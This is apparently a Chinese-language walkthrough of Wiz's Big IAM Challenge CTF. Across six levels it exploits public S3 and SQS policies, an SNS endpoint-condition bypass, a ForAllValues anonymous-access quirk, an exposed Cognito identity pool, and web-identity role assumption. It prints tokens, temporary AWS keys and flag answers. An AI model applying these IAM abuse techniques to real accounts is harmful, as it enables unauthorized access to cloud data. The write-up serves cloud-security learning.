img

Wiz-thebigiamchallenge

1. 第一部分

Buckets of Fun 存储桶的乐趣

We all know that public buckets are risky. But can you find the flag?

1.1 我们查看拥有的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                }
            }
        }
    ]
}
  • 允许所有用户对s3存储桶thebigiamchallenge-storage-9979f4b/*下所有文件进行下载
  • 允许所有用户对s3存储桶thebigiamchallenge-storage-9979f4b/files/目录下所有文件进行列举

1.2 根据这些权限我们先列举thebigiamchallenge-storage-9979f4b/files/下的文件

1
aws s3 ls  s3://thebigiamchallenge-storage-9979f4b/files/

image-20240402110453022

1.3 查看到flag.txt,然后我们将该文件下载到本地可写目录并查看

1
2
3
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt /tmp/flag
ls /tmp
cat /tmp/flag

image-20240402110616081

2. 第二部分

Google Analytics 谷歌分析

We created our own analytics system specifically for this challenge. We think it’s so good that we even used it on this page. What could go wrong?

Join our queue and get the secret flag.

1.1 我们查看拥有的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "sqs:SendMessage",
                "sqs:ReceiveMessage"
            ],
            "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
        }
    ]
}
  • 允许所有用户向arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2发送消息和接收消息

1.2 尝试发送消息和接收消息

发送一个hello消息到消息队列中

1
2
3
aws sqs send-message --queue-url "https://sqs.us-east-1.amazonaws.com/0922978513
74/wiz-tbic-analytics-sqs-queue-ca7a1b2" --message-body "Hello, this is a test mes
sage!"

查看到消息的md5和id

image-20240402112658824

尝试接收sqs消息

1
2
aws sqs receive-message --queue-url "https://sqs.us-east-1.amazonaws.com/0922978
51374/wiz-tbic-analytics-sqs-queue-ca7a1b2"

查看到消息完整结构,包括id、删除标识符、消息md5、请求体

image-20240402112853316

根据请求体进入URL进行访问即获得flag

image-20240402112951903

3. 第三部分

Enable Push Notifications 能够推送通知

We got a message for you. Can you get it?

1.1 我们查看拥有的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
{
    "Version": "2008-10-17",
    "Id": "Statement1",
    "Statement": [
        {
            "Sid": "Statement1",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "SNS:Subscribe",
            "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
            "Condition": {
                "StringLike": {
                    "sns:Endpoint": "*@tbic.wiz.io"
                }
            }
        }
    ]
}
  • 允许任何终端地址以 “@tbic.wiz.io” 结尾的AWS 用户订阅指定的 SNS 主题

1.2 尝试从终端地址订阅SNS主题

但是我们如何绕过以 “@tbic.wiz.io” 结尾呢,事实上我们不一定从email的方式进行订阅,也可以通过http的方式进行订阅。

我们可以通过nc监听http端口从而获取订阅消息。

远程主机:

1
nc -lvvp 12345

aws shell:

1
2
3
aws sns subscribe --topic-arn "arn:aws:sns:us-east-1:092297851374:TBICWizPushNot
ifications" --protocol http --notification-endpoint "http://xx.xx.xx.xx:12345/@tb
ic.wiz.io"

image-20240402114807053

远程主机:

1
curl https://sns.us-east-1.amazonaws.com/?Action=ConfirmSubscription&TopicArn=arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications&Token=2336412f37fb687f5d51e6e2425ba1f2557c40cfa9296426473bebf11d61a4631e90d1a8e8a0c89c77f5f7889b5f3806f62c6e59f2fcb23e4f0860516a0fd89471bb435f88d8f9110069d9efede2fa53927c743c18502aa112d4a58ca5bcdd29e5eb600a0c37ede1492b9b437936c3bdcce0d84b70d23fa68be2b19767aa745b

image-20240402114937180

再次监听最终收到订阅消息

image-20240402115100724

4. 第四部分

Admin only? 仅限管理员?

We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?

1.1 我们查看拥有的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
        },
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
            "Condition": {
                "StringLike": {
                    "s3:prefix": "files/*"
                },
                "ForAllValues:StringLike": {
                    "aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
                }
            }
        }
    ]
}
  • 允许所有用户/角色对指定 S3 存储桶中的所有对象执行获取操作(即下载文件)
  • 允许所有用户/角色列出指定 S3 存储桶中以 “files/“ 开头的对象,但要求操作的主体必须是 IAM 用户 admin。

1.2 多值上下文运算符ForAllValues

这个ForAllValues有个奇怪的地方,如果匹配到的是空值也会返回true,这就导致不带身份信息的用户访问s3存储桶越权的情况。

image-20240402120917492

1.3 尝试不带身份信息访问s3存储桶

使用–no-sign-request字段匿名访问s3存储桶

1
aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request

image-20240402121448278

接着同第一部分一样将flag写入本地可写目录并查看

1
2
aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt /tmp/flag1
cat /tmp/flag1

image-20240402121629110

5. 第五部分

Do I know you? 我知道你吗?

We configured AWS Cognito as our main identity provider. Let’s hope we didn’t make any mistakes.

1.1 我们查看拥有的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "mobileanalytics:PutEvents",
                "cognito-sync:*"
            ],
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::wiz-privatefiles",
                "arn:aws:s3:::wiz-privatefiles/*"
            ]
        }
    ]
}
  • 允许执行 mobileanalytics:PutEventscognito-sync:* 操作。
  • 允许执行 s3:GetObjects3:ListBucket 操作。

1.2 使用F12定位到cognito1.png附近发现敏感代码

这段代码在前端使用了Cognito身份池凭据获取了s3存储桶中的cognito1.png并根据标签返回到前端,我们可以利用这个凭据获取其他对象。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
  AWS.config.region = 'us-east-1';
  AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
  // Set the region
  AWS.config.update({region: 'us-east-1'});

  $(document).ready(function() {
    var s3 = new AWS.S3();
    params = {
      Bucket: 'wiz-privatefiles',
      Key: 'cognito1.png',
      Expires: 60 * 60
    }

    signedUrl = s3.getSignedUrl('getObject', params, function (err, url) {
      $('#signedImg').attr('src', url);
    });
});

我们先使用listObjects方法以同样的方式列举s3存储桶对象

1
2
3
4
5
6
7
8
9
10
11
12
13
AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
// Set the region
AWS.config.update({region: 'us-east-1'});

var s3 = new AWS.S3();
params = {
  Bucket: 'wiz-privatefiles'
}

signedUrl = s3.getSignedUrl('listObjects', params, function (err, url) {
      console.log(url);
});

image-20240402140002248

访问链接可查看详细对象信息

image-20240402140117462

利用getobject方法获取flag1.txt内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
AWS.config.region = 'us-east-1';
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
// Set the region
AWS.config.update({region: 'us-east-1'});

var s3 = new AWS.S3();
params = {
  Bucket: 'wiz-privatefiles',
  Key: 'flag1.txt'
}

signedUrl = s3.getSignedUrl('getObject', params, function (err, url) {
      console.log(url);
});

image-20240402141142564

访问链接获取flag1.txt内容

image-20240402141227400

6. 第六部分

One final push 最终推送

Anonymous access no more. Let’s see what can you do now.

Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role

1.1 我们查看拥有的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "cognito-identity.amazonaws.com"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
                }
            }
        }
    ]
}
  • sts:AssumeRoleWithWebIdentity 是 AWS Security Token Service (STS) 中的一种操作,用于通过 Web 身份验证(如 OpenID Connect 或者 AWS Cognito)获取角色的临时安全凭证。这个操作允许基于经过身份验证的 Web 用户身份来假定指定的 IAM 角色,并获取一个临时的安全凭证,以便在一段时间内访问 AWS 资源。
  • 可以获取的信息还有我们的身份池地址:us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b

1.2 我们尝试进行sts身份认证获取凭证

先尝试一下认证

1
aws sts assume-role-with-web-identity

image-20240402142645204

发现需要提供三个参数

  • –role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role(题目已给出)

  • –role-session-name

    iam-final(任意值)

  • –web-identity-token

    通过身份池地址进行获取身份id,然后获取token,前面的题目也有类似方法

1.3 获取token并进行sts认证

获取身份id

1
aws cognito-identity get-id --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b

image-20240402145024182

获取token

1
aws cognito-identity get-open-id-token --identity-id us-east-1:157d6171-eebb-c389-cc99-2f1643910337

image-20240402145045191

尝试sts认证获取凭据

1
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name iam-final --web-identity-token eyJraWQiOiJ1cy1lYXN0LTE1IiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6MTU3ZDYxNzEtZWUxYy1jZjVmLTAxODItNDhmYjcxOTk3NDkyIiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE3MTIwNDA5NDIsImlhdCI6MTcxMjA0MDM0Mn0.fvdf9FUyP_jX8FlAZmPecDP2b751Y8onuxM-oDttmiFhgfrEvmtTt2WMirYknUBcPyRbxvq65sHI8gVACaSBhdvXX-hFMsufHT-zvXuqknk-tw8iQbh5R6TiqIwALFw_XKI42MwtKEwM4_rIGuWi3NfUsvCTw2ozasNUH0yHVY4i7zoZrZjK6F8FouwkCISJXg3EpFaLLGbhGZvFWPo8zXve0e2b_jvov46je9s4Bcg9P1yizVZdxPoWit3hzIhZCqcCWucXQBcHQ92iV5utBDz8UuikdAI2WfInZyEOmnfI7tD9G2GUMtbVdZ9epnbbbxe9uOBLZtvSjW0vrIFqyg

image-20240402145111698

设置我们获取的凭据

1
2
3
export AWS_ACCESS_KEY_ID=ASIARK7LBOHXBDE2Z6T7
export AWS_SECRET_ACCESS_KEY=9nIvs6cieraSGqKTmcVKtnRam3GqSXH7rZkV2ZOm
export AWS_SESSION_TOKEN=FwoGZXIvYXdzEEAaDNcSynI3yxJRduYP0iKhAp42je5FxsoJHQ7s0eicfTkA24WP3xjJpsFuPWnDsTyACa8auN1wUApThySmgsCy3H90LwBHWI92YuIxE3notWVtsyB6dzjzceHi8U29DWeqz8Odgr5HPJGujN5v6ehyEhVcRGRXtLgVT2nLFxavSfhoO9ko3+MUS6eEUJLvPNZaKE9V6PgEsq4D6vcfixJ773hiY8U8XWEDKZ/hKIT+1P2YkPo2aZzzTCb8A4JHWurVCr8AgxFqZq7qwag7lT3xQdutXC15k+8/rwkcaF3gvOvL/ysG2Oa6EJivzKFhOSw3FOL6agKM9jv8ZjgkTlnUOJ/8eROARctlVeNJst5ZjVTeT3sWNlkQkY+mCKLoBC/jYGOhZlxfjs4rRzBXvLbln/Yo5dSusAYylgGoiwogzTBbK8wOe8OUbtdTzGH+TSB81vclAhwfzDJQbW8K6Q5daFjPk2j9IImpZAODGNDLZGRZScGsuaCj/Y+S4h5hPrGmkIBkjWdGVlmXGG/VWoVk94e7s0wbQmWOwhk0HZkMwk6THHo7lkQdXmChLLg4TpHngf3f1phWMVS77irKza0osUjIMkTd44aAWTacYaV1hvE=

最终操作s3桶获取flag

{wiz:open-sesame-or-shell-i-say-openid}

本文采用CC-BY-SA-3.0协议,转载请注明出处
Author: Sally